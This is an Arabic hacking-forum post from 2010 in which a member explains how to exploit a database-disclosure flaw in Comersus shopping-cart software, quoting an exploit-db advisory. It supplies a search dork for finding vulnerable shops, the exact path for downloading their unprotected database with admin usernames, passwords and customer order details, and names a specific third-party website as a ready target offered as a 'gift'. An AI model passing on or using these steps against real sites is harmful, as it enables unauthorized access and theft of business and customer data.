التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الهكــر العــام ~ General Hacking Section .:: ] > Hackers Showoff

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-30-2010, 03:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Talking مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...


السلام عليكم ورحمه الله وبركاته ...


كيفكم ياحلوين اكيد بخير ، << دوم يارب ..

قبل لا ادخل في الموضوع ياريت [ الادارة تفتح قســم خاص بشروحات الثغرات عشان اشرح لكم ] ...



المهم ندخل في صلب الموضوع . ما ابي اطول عليـــكم ..


بسم الله الرحمن الرحيــم ..

اولا هذا موقع الثغره .. للي مايعرف الموقع تبع الثغرات .. :d

www.exploit-db.com

طبعــا موقع >>:

www.MilW0rM.com

^_^ مغلق له 8 شهــور تقريبــأ ....

خلوكم على هذا افضل ..>>:

www.exploit-db.com


نكمل الشرح ..

هذي الثغره الي تخليك تحمل الملف تبع الموقع وفيه معلومات الادمن خخخخخ

http://www.exploit-db.com/exploits/11931

وبشرحهــا لكم ..


الثغره .:

اقتباس
# Title: Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
# EDB-ID: 11931
# CVE-ID: ()
# OSVDB-ID: ()
# Author: indoushka
# Published: 2010-03-29
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?

================================================== ======================================
| # Title : Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
| # Author : indoushka
| # Home : www.iqs3cur1ty.com
| # Bug : Database Disclosure
====================== Exploit By indoushka =================================
# Exploit :


1- http://127.0.0.1/Comersus/database/comersus.mdb

# Brief Description:

By default, comersus.mdb isn't password-protected, and contains the following sensitive information:
- order information (buyer's address, phone, order status, tracking #, obs, etc)
- settings (encryption password, admin email, company information, etc)
- shipments
- etc

Enough to cause damage for the business if any of that information is obtained.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------




اولا .: الدورك ..:

inurl:Asp - comersus7F

واتحداك تحصل الدورك في الثغرة خخخخخخخخخخخخخخخخ

طيب نجي للإستغلال .. مكتوب في الثغره .:

http://127.0.0.1/Comersus/database/comersus.mdb

هذا الاستغلال .. خـطا .. انا اشوف ، انه خـطا ..

وهذا الصحيح ..

http://www.Dr.NaNo.com/comersus7F/database/comersus.mdb


ركزو معي ..:

اكتبو بعد رابط الموقع هذا المسار بس ..:

comersus7F/database/comersus.mdb

وراح يجيك ملف حمله وبتحصل فيه اليوزر والباسورد ههههههههه لوووول


وهذا موقع هدية مني لكم ... :D

كود PHP:
http://www.totalhealthantiageingclinic.com.au/comersus7F/database/comersus.mdb 
################################


الي مافهم ...: < راح افهمــه

رح خذ [ الدورك ] الي فوق ..

وبتطلع لك مواقع بالهبل .. مثل شعر قروشــة .. هههههههههههههههههه

بعدين اختر اي موقع ..:

وامسح الكلام كله. وخل الرابــط كذا

www.xxxx.com

بس واكتب وراه على طول هذا المسار ..:

comersus7F/database/comersus.mdb


وخلاص انتهى ياشنب ...بجيك تحميل حمل وافتحه وبتحصل الباسورد واليورز .. وبس ..:

:D


أنتهى الشششششششششششششششششرح :00001793[1]:


لووووووووووووووول :icon555:


الشــــرح اهـــــداء الى ..:

فريق كلاشنكوف .

والهيكل الارزق .

ودوم البطل .

وسنايبر غزة .

وقروشـة .

ومين كمان ؟ نسيت الباقين والله ..

وإهداء لكل العنــــــــاكـــــب ... < عشان ماحد يزعل ..


تحياتي لكم اخواكم ./

Dr.NaNo



lu Dr>NaNo F juhg plg hglgt jfu hgl,ru >> ,Yojvr >>>>> g,,,,,,,,g D>>>

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دورك الألف الموقع المصابه|مع شرح بسيط.. DR.THMoORY SQL قواعد البيانات 41 11-14-2010 10:33 PM
- كيف أجمع معلومات حول الموقع ؟(تعال افهمك تعال) KaLa$nikoV قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 14 02-26-2010 05:03 PM
افضل موقع لمرفة معلومات عن الموقع + ايميل صاحب الموقع + سيرفرات الموقع + صاحب الموقع MATRIX ALGERIA قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 3 01-05-2010 11:42 PM
[شرح] : إزالة رابط الموقع الشخصي ، من الملف الشخصي للعضو ! skfn.net xman2 قســم تطويــر المــــواقع 0 09-02-2009 01:30 AM
تعال أدخل شوف معاي الموقع الأجنبي AZOZ جـــ'ابات العناكــ'ب 3 08-08-2009 03:57 AM


الساعة الآن 03:58 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0